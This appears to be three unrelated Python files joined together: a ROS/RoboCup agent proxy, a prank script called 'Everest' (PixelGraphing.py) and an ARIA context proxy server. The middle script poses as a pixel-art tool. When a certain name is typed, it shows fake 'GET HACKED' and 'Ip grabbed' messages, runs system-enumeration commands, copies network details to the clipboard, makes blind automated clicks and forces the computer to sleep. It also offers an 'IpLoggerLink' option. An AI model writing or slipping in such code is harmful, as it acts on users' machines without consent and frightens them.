def makeGyroSExpr(self, name, x, y, z):
return "(GYR (n " + str(name) + ") (rt " + str(x) + " " + str(y) + " " + str(z) + "))"
def makeAccelSExpr(self, name, x, y, z):
return "(ACC (n " + str(name) + ") (a " + str(x) + " " + str(y) + " " + str(z) + "))"
def makeHingeJointSExpr(self, name, ax):
return "(HJ (n " + str(name) + ") (ax " + str(ax) + "))"
# Names: lf (left foot), rf (right foot)
def makeForceResistancePerceptorSExpr(self, name, px, py, pz, fx, fy, fz):
return "(FRP (n " + str(name) + ") (c " + str(px) + " " + str(py) + " " + str(pz) + ") (f " + str(fx) + " " + str(fy) + " " + str(fz) + "))"
def makeSeeSExpr(self, visionSExprs):
return "(See " + visionSExprs + ")"
# Must be put inside see message
# Names: B (ball), G<1,2><L,R> (goal post <1,2> <left,right>), F<1,2><L,R> (corner flag <1,2> <left,right>)
def makeSeenObjectSExpr(self, name, distance, theta, phi):
return "(" + str(name) + " (pol " + str(distance) + " " + str(theta) + " " + str(phi) + "))"
# Must be put inside see message
def makeSeenLineSExpr(self, distance1, theta1, phi1, distance2, theta2, phi2):
return "(L (pol " + str(distance1) + " " + str(theta1) + " " + str(phi1) + ") (pol " + str(distance2) + " " + str(theta2) + " " + str(phi2) + "))"
# Must be put inside see message
# bodyParts is a list of bodyparts where each bodypart is itself a list in the format (partName, distance, theta, phi). Possible body parts are the following: head, rlowearam, llowerarm, rfoot, lfoot
def makeSeenPlayerSExpr(self, team, id, bodyParts):
ret = "(P (team " + str(team) + ") (id " + str(id) + ")"
for p in bodyParts:
ret = ret + " (" + str(p[0]) + " (pol " + str(p[1]) + " " + str(p[2]) + " " + str(p[3]) + "))"
return ret + ")"
# Must be put inside see message
def makeGroundTruthMyPosSExpr(self, x, y, z):
return "(mypos " + str(x) + " " + str(y) + " " + str(z) + ")"
# Must be put inside see message
def makeGroundTruthMyOrienSExpr(self, angle):
return "(myorien " + str(angle) + ")"
# Must be put inside see message
def makeGroundTruthBallPosSExpr(self, x, y, z):
return "(ballpos " + str(x) + " " + str(y) + " " + str(z) + ")"
def makeHearSExpr(self, teamName, time, self_or_direction, message):
if teamName == None:
return "(hear " + str(time) + " " + str(self_or_direction) + " " + message + ")"
return "(hear " + str(teamName) + " " + str(time) + " " + str(self_or_direction) + " " + message + ")"
def makeSExprForAgent(self):
msg = ""
if self._serverTime != None:
#self._serverTime += 0.02
msg = msg + self.makeTimeSExpr(self._serverTime)
if self._serverGameStateTime != None and self._serverGameStatePlayMode != None:
msg = msg + self.makeGameStateSExpr(self._serverGameStateTime, self._serverGameStatePlayMode, self._serverGameStateScoreLeft, self._serverGameStateScoreRight, self._serverGameStateID, self._serverGameStateSide)
if self._serverGyro != None:
msg = msg + self.makeGyroSExpr(self._serverGyro[0], self._serverGyro[1], self._serverGyro[2], self._serverGyro[3])
if self._serverAccel != None:
msg = msg + self.makeAccelSExpr(self._serverAccel[0], self._serverAccel[1], self._serverAccel[2], self._serverAccel[3])
if len(self._serverSeenObjects) > 0 or len(self._serverSeenPlayers) > 0 or len(self._serverSeenLines) > 0 or self._serverMyPos != None or self._serverMyOrien != None or self._serverBallPos != None:
visionMsgs = ""
for i in self._serverSeenObjects:
visionMsgs = visionMsgs + self.makeSeenObjectSExpr(i[0], i[1], i[2], i[3])
for i in self._serverSeenPlayers:
visionMsgs = visionMsgs + self.makeSeenPlayerSExpr(i[0], i[1], i[2])
for i in self._serverSeenLines:
visionMsgs = visionMsgs + self.makeSeenLineSExpr(i[0][0], i[0][1], i[0][2], i[1][0], i[1][1], i[1][2])
if self._serverMyPos != None:
visionMsgs = visionMsgs + self.makeGroundTruthMyPosSExpr(self._serverMyPos[0], self._serverMyPos[1], self._serverMyPos[2])
if self._serverMyOrien != None:
visionMsgs = visionMsgs + self.makeGroundTruthMyOrienSExpr(self._serverMyOrien)
if self._serverBallPos != None:
visionMsgs = visionMsgs + self.makeGroundTruthBallPosSExpr(self._serverBallPos[0], self._serverBallPos[1], self._serverBallPos[2])
msg = msg + self.makeSeeSExpr(visionMsgs)
for i in self._serverForceResistancePerceptors:
msg = msg + self.makeForceResistancePerceptorSExpr(i[0], i[1][0], i[1][1], i[1][2], i[2][0], i[2][1], i[2][2])
if self._serverHear != None:
if len(self._serverHear) == 3:
msg = msg + self.makeHearSExpr(None, self._serverHear[0], self._serverHear[1], self._serverHear[2])
else:
msg = msg + self.makeHearSExpr(self._serverHear[0], self._serverHear[1], self._serverHear[2], self._serverHear[3])
for i in self._serverHingeJoints:
msg = msg + self.makeHingeJointSExpr(i[0], i[1])
return msg
def onServerUpdate(self, data):
self.mutex.acquire()
# Check elapsed time since the last update.
#elapsed_time = (data.sim_time.to_sec() - self._lastStateTime.to_sec()) * 1000.0
#if elapsed_time < 19.0:
# self.mutex.release()
# return;
#print 'Elapsed_time: ', elapsed_time
#print 'Sim time:', data.sim_time.to_sec()
# Clear all values
self._initializeServerValues()
# Changing the time
self._serverTime = data.sim_time.to_sec()
# Update the game state.
self._serverGameStatePlayMode = data.game_state.play_mode
self._serverGameStateScoreLeft = data.game_state.score_left
self._serverGameStateScoreRight = data.game_state.score_right
self._serverGameStateTime = data.game_state.time.to_sec()
# Update joint state.
for i in range(len(data.joint_name)):
self._serverHingeJoints.append((data.joint_name[i], data.joint_angle_1[i]))
print data.joint_name[i], ':', data.joint_angle_1[i]
# Set the gyro values
#print self._serverGyro
if self._serverGyro != None:
self._serverGyro = ('torso', data.gyro_angular[0].x, data.gyro_angular[0].y, data.gyro_angular[0].z)
if self._serverAccel != None:
self._serverAccel = ('torso', data.gyro_linear[0].x, data.gyro_linear[0].y, data.gyro_linear[0].z)
# Set the force sensor values
# Update timestamp
self._lastStateTime = data.sim_time
elapsed_time = (data.sim_time.to_sec() - self._lastPerceptionTime.to_sec()) * 1000.0
if elapsed_time < 60.0:
self.mutex.release()
return;
#print "Perception update"
self._updatesCounter = 0;
# Update perception every three cycles.
# Set the perception
for landmark in data.landmarks:
self._serverSeenObjects.append((landmark.name, landmark.bearing.distance, landmark.bearing.angle1, landmark.bearing.angle2))
for line in data.lines:
self._serverSeenLines.append(((line.bearings[0].distance, line.bearings[0].angle1, line.bearings[0].angle2), (line.bearings[1].distance, line.bearings[1].angle1, line.bearings[1].angle2)))
# Update perception timestamp
self._lastPerceptionTime = data.sim_time
self.mutex.release()
def initAgent(self, team, number):
rospy.wait_for_service('/gameController/init_agent')
try:
init_agent_f = rospy.ServiceProxy('/gameController/init_agent', InitAgent)
path = os.path.join(config.ModelResourcesDir, 'nao_models/nao_soccer.sdf')
resp = init_agent_f(path, team, number)
return resp.result
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def moveAgent(self, player_id, x, y, theta):
rospy.wait_for_service('/gameController/move_agent')
try:
move_agent_f = rospy.ServiceProxy('/gameController/move_agent', MoveAgentPose)
pos = Beam()
pos.x = x
pos.y = y
pos.theta = theta
move_agent_f('teamA', 1, None, pos)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def sendJoints(self):
rospy.wait_for_service('/teamA_1/send_joints')
try:
# if the list of joint commands is not 22, just return.
if len(self._agentJointRequests) != 22:
return
send_joints_f = rospy.ServiceProxy('/teamA_1/send_joints', SendJoints)
# Create a dictionary from the list
toServer = {}
#print 'agent joint request:'
#print self._agentJointRequests
for joint in self._agentJointRequests:
#print 'joint:'
#print joint
toServer[joint[0]] = float(joint[1])
newJoints = []
newJoints.append(toServer['he1'])
newJoints.append(toServer['he2'])
newJoints.append(toServer['lle1'])
newJoints.append(toServer['lle2'])
newJoints.append(toServer['lle3'])
newJoints.append(toServer['lle4'])
newJoints.append(toServer['lle5'])
newJoints.append(toServer['lle6'])
newJoints.append(toServer['lae1'])
newJoints.append(toServer['lae2'])
newJoints.append(toServer['lae4'])
newJoints.append(toServer['lae3'])
newJoints.append(toServer['rle1'])
newJoints.append(toServer['rle2'])
newJoints.append(toServer['rle3'])
newJoints.append(toServer['rle4'])
newJoints.append(toServer['rle5'])
newJoints.append(toServer['rle6'])
newJoints.append(toServer['rae1'])
newJoints.append(toServer['rae2'])
newJoints.append(toServer['rae4'])
newJoints.append(toServer['rae3'])
send_joints_f(newJoints)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
def run(self, s):
msgSize = s.recv(4)
msgSize = struct.unpack("!L", msgSize)
#print msgSize[0]
msg = s.recv(msgSize[0])
#print "From agent: " + msg
self._agentTree = self._getTreeFromSExpr(msg)
self._populateAgentValuesFromTree()
#print self.agentTree
#self.printAgentValues()
#sserver = socket.socket() # Create a sock et object
#host = socket.gethostbyname("localhost")
#print host
#sserver.connect((host, 3100))
robot_id = self.initAgent('teamA', 0)
rospy.Subscriber("/teamA_" + str(robot_id) + "/state", AgentState, self.onServerUpdate)
#self.moveAgent(1, 0, 0, 0)
while True:
self.mutex.acquire()
if self._lastMessageSentTime >= self._lastStateTime:
self.mutex.release()
time.sleep(.001)
continue
print self._lastMessageSentTime, self._lastStateTime, self._serverTime
self._lastMessageSentTime = self._lastStateTime
#msgToServer = struct.pack("!I", len(msg)) + msg
#sserver.send(msgToServer)
#msgSize = sserver.recv(4)
#msgSize = struct.unpack("!L", msgSize)
#print msgSize[0]
#msgFromServer = sserver.recv(msgSize[0])
#print "From server: " + msgFromServer
#self._serverTree = self._getTreeFromSExpr(msgFromServer)
#print self._serverTree
#self._populateServerValuesFromTree()
# Hardcoding the uniform number and side.
msgForAgent = self.makeSExprForAgent()
self.mutex.release()
# print "Message for agent: " + msgForAgent
msgToAgent = struct.pack("!I", len(msgForAgent)) + msgForAgent
#msgToAgent = struct.pack("!I", len(msgFromServer)) + msgFromServer
s.send(msgToAgent)
msgSize = s.recv(4)
msgSize = struct.unpack("!L", msgSize)
#print msgSize[0]
msg = s.recv(msgSize[0])
print "From agent: " + msg
self._agentTree = self._getTreeFromSExpr(msg)
self._populateAgentValuesFromTree()
# Send joints to the server
self.sendJoints()
#print self.agentTree
#print self.agentValues
#print self.values
self.printAgentValues()
#sys.argv = [sys.argv[0], 'localhost', 3400]
if len(sys.argv) > 1 and sys.argv[1] == "--help":
print "Usage: " + sys.argv[0] + " [host] [port]"
sys.exit()
host = "localhost"
if len(sys.argv) > 1:
host = sys.argv[1]
port = 3100
if len(sys.argv) > 2:
port = int(sys.argv[2])
try:
#create an AF_INET, STREAM socket (TCP)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
host = socket.gethostbyname( host )
except socket.gaierror:
#could not resolve
print 'Hostname could not be resolved. Exiting'
sys.exit()
rospy.init_node('listener', anonymous=True)
#Connect to remote server
serversocket.bind((host, port))
serversocket.listen(22)
while True:
#accept connections from outside
(clientsocket, address) = serversocket.accept()
#now do something with the clientsocket
#in this case, we'll pretend this is a threaded server
print 'Got connection from', address
aI = agentInterface()
#aI.run(clientsocket)
t = threading.Thread(target = aI.run, args = (clientsocket,))
t.start()
#ct = client_thread(clientsocket)
#ct.run()
s.close()
|
PixelGraphing.py | try:
y=0
import os
import webbrowser
from os import path, system
import pyautogui
import time
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image
import sys
import time
from colorama import init, Fore, Back, Style
import logging
import datetime
import getpass
import socket
from selenium import webdriver
import itertools
import threading
import playsound
except ImportError:
print("Trying to install the required modules! THIS MAY DISPLAY LARGE ERRORS!\nPlease try to run this script again once all of the modules have been successfully installed.\n\n")
input("press enter to start installing... ")
system("py -m pip install -r requirements.txt")
system("python -m pip install -r requirements.txt")
system("python3 -m pip install -r requirements.txt")
input("\n\ndone installing modules! please restart the script now. Press enter to continue... ")
quit()
init()
print('Launching "Everest"...')
done = False
#here is the animation
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading... ' + c)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(2)
done = True
print(' Starting...')
done = False
#here is the animation
def animate():
for c in itertools.cycle(['}', '.', '[', '\\']):
if done:
break
sys.stdout.write('\rloading... ' + c)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
#long process here
time.sleep(3)
done = True
cls = lambda: system('cls')
Sound=input(' Do you want to play music y/n: ')
if Sound=="y":
path = './Music'
files = os.listdir(path)
for f in files:
print(f)
PickaMusic=input(' What music would you like to play:')
playsound.playsound(PickaMusic, False)
if Sound == "n":
system('cls')
system('cls')
print(Fore.GREEN + " โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ")
time.sleep(0.3)
print(Fore.GREEN + " |___ _ |")
time.sleep(0.3)
print(Fore.GREEN + " || __|__ __ ___ _ _ ___ ___| |_|")
time.sleep(0.3)
print(Fore.GREEN + " || _| \ V // -_)| '_|/ -_)(_-/| _|")
time.sleep(0.3)
print(Fore.GREEN+ " ||___| \_/ \___||_| \___|/__/ \__|")
time.sleep(0.3)
print(Fore.GREEN + " โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ")
(Fore.MAGENTA + "Date: %s" % time.ctime())
time.sleep(0.3)
string = 'Follow me on Twitter! @LaiBranden...'
substr = ""
for char in string:
substr += char
print(substr, end="\r")
time.sleep(0.03)
print('Welcome to Everest..., '+getpass.getuser()+"!")
print(Fore.WHITE + socket.gethostname() + Fore.WHITE + '!')
string ='Welcome to Everest..., '+getpass.getuser()+"!"
substr = ""
for char in string:
substr += char
print(substr, end="\r")
time.sleep(0.03)
print('Welcome')
name = str(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN+'> What is your Username?: '))
x=name
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"Hello" + " "+name + "!")
if name == 'Branden Lai':
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + 'Ethernet adapter Radmin VPN: Connection-specific DNS Suffix Disconnected... Ip:192.432.432 Connected... Connection Radmin Unistalled...Ethernet adapter VirtualBox Host-Only Network...Ip Grabbed Successful...Media disconnected...Wireless LAN adapter Wi-Fi Disconnected...Tunnel adapter Teredo Tunneling Pseudo-Interface Connected...Port:2138 Tunneled...Ip Grabbed...Requirement already satisfied:...Requirement already satisfied:...Requirement already satisfied:...Requirement already satisfied: Path:C:/Users/Lib/Desktop/Image Project/697033-32983.jpg Installed...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied...Requirement already satisfied... GET HACKED KID :D ')
system("pip3 install aiohttp")
system("ipconfig")
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.BLUE + "https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...")
pyautogui.click(x=310, y=618)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=618)
pyautogui.click(x=310, y=418)
pyautogui.click(x=310, y=418)
pyautogui.click(x=310, y=418)
system(Fore.MAGENTA+"ipconfig")
system(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"prompt Branden Lai Is OP get Rick ROlled")
time.sleep(2)
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
pyautogui.click(x=310, y=218)
system("pip3 install asyncio")
system("tree")
system("pip install beautifulsoup4")
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
pyautogui.click(x=310, y=218)
system("ipconfig")
system("tree")
system("tree")
pyautogui.click(x=310, y=218)
system("tree")
system("tree")
pyautogui.click(x=310, y=218)
system("title MY COMPUTER NOW")
print("Look at your cmd title :>")
system("tree")
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
system("tree")
pyautogui.click(x=310, y=218)
system("tree")
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
system("tree")
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
pyautogui.click(x=310, y=218)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"I Told you Not to enter my Name :)")
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +"Ip grabbed :) Get Rick Rolled Kid :D https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO...")
time.sleep(2)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'Ok BYE BYE :>')
pyautogui.click(x=310, y=218)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
system("tree")
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
pyautogui.click(x=310, y=218)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
system("ipconfig | clip")
pyautogui.click(x=310, y=3218)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'I told you not to enter my name KID Listen :) Byeeee')
pyautogui.click(x=310, y=218)
system("ipconfig/all")
system("ipconfig | clip")
pyautogui.click(x=310, y=3218)
system("nslookup google.com")
system("ipconfig | clip")
system("tree")
system("ipconfig | clip")
pyautogui.click(x=310, y=218)
system("ipconfig | clip")
pyautogui.click(x=310, y=218)
system("ipconfig | clip")
system("wmic product get name")
system("tree")
system("RUNDLL32.EXE powrprof.dll,SetSuspendState 0,1,0")
exit()
else:
if name == 'Jason Choe':
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.BLUE + "You are my Best friend Forever! Thanks for everything you have done!!! Thanks for the cakes!")
exit()
else:
if name == 'Benjamin King':
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.RED + "Thanks for Being my Best friend! I owe you big time!")
exit()
else:
if name == 'Danny Kim':
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + "We will Miss you in korea!!! Make sure to keep in contact with us.")
exit()
else:
if name == 'Sriram Sivakumar':
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.GREEN + 'Thanks for teaching me coding and using your own time for me! Please keep teaching me and Thanks so much!!!')
else:
if name == 'Everest':
print(Fore.RED + '[Admin]')
Age = int(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + '> What is your age?: '))
if Age >= 12:
print('')
else:
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.CYAN + 'Sorry! You are too young. Come back when your 12 and older!')
exit()
option = int(input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +'[1]: Pixel!:, [2]:Discord(DM)!:, [3]:HandSniperBot(Minecraft):, [4]:IpLoggerLink: '))
if option == 1:
MainPage = input(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.MAGENTA + '> Do you want to print your image? y/n:')
if MainPage == "y":
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +'Mainpage')
else:
print(f"your path is {path}")
path = "C:/Users/Branden/Desktop/Image Project/697033-bigthumbnail.jpg"
matrix = [[[255, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]],
[[0, 0, 0], [0, 0, 0]]]
i = Image.open(path).resize((250, 150)).convert("L")
plt.imshow(i)
i = np.array(i)
plt.show()
for row in i:
RowString = ""
for pixel in row:
if pixel > 112.5:
RowString = RowString + "#"
if pixel < 112.5:
RowString = RowString + " "
print(RowString)
#Discord(DM)
if option == 2:
print('Hello World')
#Minecraft HandSniperBot
if option == 3:
print('Hello World')
#IpLoggerLink
if option ==4:
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[AI]+Opening 000webhost Free...")
time.sleep(3)
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[AI]"+ webbrowser.open('https://000webhost.com/'))
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[Steps]"+Fore.GREEN+ "Please click Sign In!")
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" +Fore.YELLOW+"[Steps]"+Fore.GREEN+"Press Enter to continue:")
print(Fore.RED + "[" + Fore.BLUE + getpass.getuser() + Fore.RED + "@"+Fore.BLUE+"Everest" + Fore.RED + "]" + Fore.YELLOW +"[Bot]")
webbrowser.open("https://000webhost.com/")
driver = webdriver.Chrome(executable_path="C:\Program Files (x86)\chromedriver.exe")
driver.maximize_window()
driver.get("https://000webhost.com/")
driver.refresh()
driver.find_element_by_link_text("LOG IN WITH GOOGLE").click()
driver.close()
|
server.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
``ctx`` proxy server implementation.
"""
import collections
# from sqlalchemy.orm.collections import mapped_collection
import json
import re
import socket
import threading
import traceback
import Queue
import StringIO
import wsgiref.simple_server
import bottle
from aria import modeling
from .. import exceptions
class CtxProxy(object):
def __init__(self, ctx, ctx_patcher=(lambda *args, **kwargs: None)):
self.ctx = ctx
self._ctx_patcher = ctx_patcher
self.port = _get_unused_port()
self.socket_url = 'http://localhost:{0}'.format(self.port)
self.server = None
self._started = Queue.Queue(1)
self.thread = self._start_server()
self._started.get(timeout=5)
def _start_server(self):
class BottleServerAdapter(bottle.ServerAdapter):
proxy = self
def close_session(self):
self.proxy.ctx.model.log._session.remove()
def run(self, app):
class Server(wsgiref.simple_server.WSGIServer):
allow_reuse_address = True
bottle_server = self
def handle_error(self, request, client_address):
pass
def serve_forever(self, poll_interval=0.5):
try:
wsgiref.simple_server.WSGIServer.serve_forever(self, poll_interval)
finally:
# Once shutdown is called, we need to close the session.
# If the session is not closed properly, it might raise warnings,
# or even lock the database.
self.bottle_server.close_session()
class Handler(wsgiref.simple_server.WSGIRequestHandler):
def address_string(self):
return self.client_address[0]
def log_request(*args, **kwargs): # pylint: disable=no-method-argument
if not self.quiet:
return wsgiref.simple_server.WSGIRequestHandler.log_request(*args,
**kwargs)
server = wsgiref.simple_server.make_server(
host=self.host,
port=self.port,
app=app,
server_class=Server,
handler_class=Handler)
self.proxy.server = server
self.proxy._started.put(True)
server.serve_forever(poll_interval=0.1)
def serve():
# Since task is a thread_local object, we need to patch it inside the server thread.
self._ctx_patcher(self.ctx)
bottle_app = bottle.Bottle()
bottle_app.post('/', callback=self._request_handler)
bottle.run(
app=bottle_app,
host='localhost',
port=self.port,
quiet=True,
server=BottleServerAdapter)
thread = threading.Thread(target=serve)
thread.daemon = True
thread.start()
return thread
def close(self):
if self.server:
self.server.shutdown()
self.server.server_close()
def _request_handler(self):
request = bottle.request.body.read() # pylint: disable=no-member
response = self._process(request)
return bottle.LocalResponse(
body=json.dumps(response, cls=modeling.utils.ModelJSONEncoder),
status=200,
headers={'content-type': 'application/json'}
)
def _process(self, request):
try:
with self.ctx.model.instrument(*self.ctx.INSTRUMENTATION_FIELDS):
typed_request = json.loads(request)
args = typed_request['args']
payload = _process_ctx_request(self.ctx, args)
result_type = 'result'
if isinstance(payload, exceptions.ScriptException):
payload = dict(message=str(payload))
result_type = 'stop_operation'
result = {'type': result_type, 'payload': payload}
except Exception as e:
traceback_out = StringIO.StringIO()
traceback.print_exc(file=traceback_out)
payload = {
'type': type(e).__name__,
'message': str(e),
'traceback': traceback_out.getvalue()
}
result = {'type': 'error', 'payload': payload}
return result
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _process_ctx_request(ctx, args):
current = ctx
num_args = len(args)
index = 0
while index < num_args:
arg = args[index]
attr = _desugar_attr(current, arg)
if attr:
current = getattr(current, attr)
elif isinstance(current, collections.MutableMapping):
key = arg
path_dict = _PathDictAccess(current)
if index + 1 == num_args:
# read dict prop by path
value = path_dict.get(key)
current = value
elif index + 3 == num_args:
# set dict prop by path
value = args[index + 2]
path_dict.set(key, value)
current = None
else:
raise RuntimeError('Illegal argument while accessing dict')
break
elif callable(current):
kwargs = {}
remaining_args = args[index:]
if isinstance(remaining_args[-1], collections.MutableMapping):
kwargs = remaining_args[-1]
remaining_args = remaining_args[:-1]
current = current(*remaining_args, **kwargs)
break
elif arg in current.keys():
# TODO...check type
value = current[arg].value
current = value._wrapped
else:
raise RuntimeError('{0} cannot be processed in {1}'.format(arg, args))
index += 1
if callable(current):
current = current()
return current
def _desugar_attr(obj, attr):
if not isinstance(attr, basestring):
return None
if hasattr(obj, attr):
return attr
attr = attr.replace('-', '_')
if hasattr(obj, attr):
return attr
return None
class _PathDictAccess(object):
pattern = re.compile(r"(.+)\[(\d+)\]")
def __init__(self, obj):
self.obj = obj
def set(self, prop_path, value):
obj, prop_name = self._get_parent_obj_prop_name_by_path(prop_path)
obj[prop_name] = value
def get(self, prop_path):
value = self._get_object_by_path(prop_path)
return value
def _get_object_by_path(self, prop_path, fail_on_missing=True):
# when setting a nested object, make sure to also set all the
# intermediate path objects
current = self.obj
for prop_segment in prop_path.split('.'):
match = self.pattern.match(prop_segment)
if match:
index = int(match.group(2))
property_name = match.group(1)
if property_name not in current:
self._raise_illegal(prop_path)
if not isinstance(current[property_name], list):
self._raise_illegal(prop_path)
current = current[property_name][index]
else:
if prop_segment not in current:
if fail_on_missing:
self._raise_illegal(prop_path)
else:
current[prop_segment] = {}
current = current[prop_segment]
return current
def _get_parent_obj_prop_name_by_path(self, prop_path):
split = prop_path.split('.')
if len(split) == 1:
return self.obj, prop_path
parent_path = '.'.join(split[:-1])
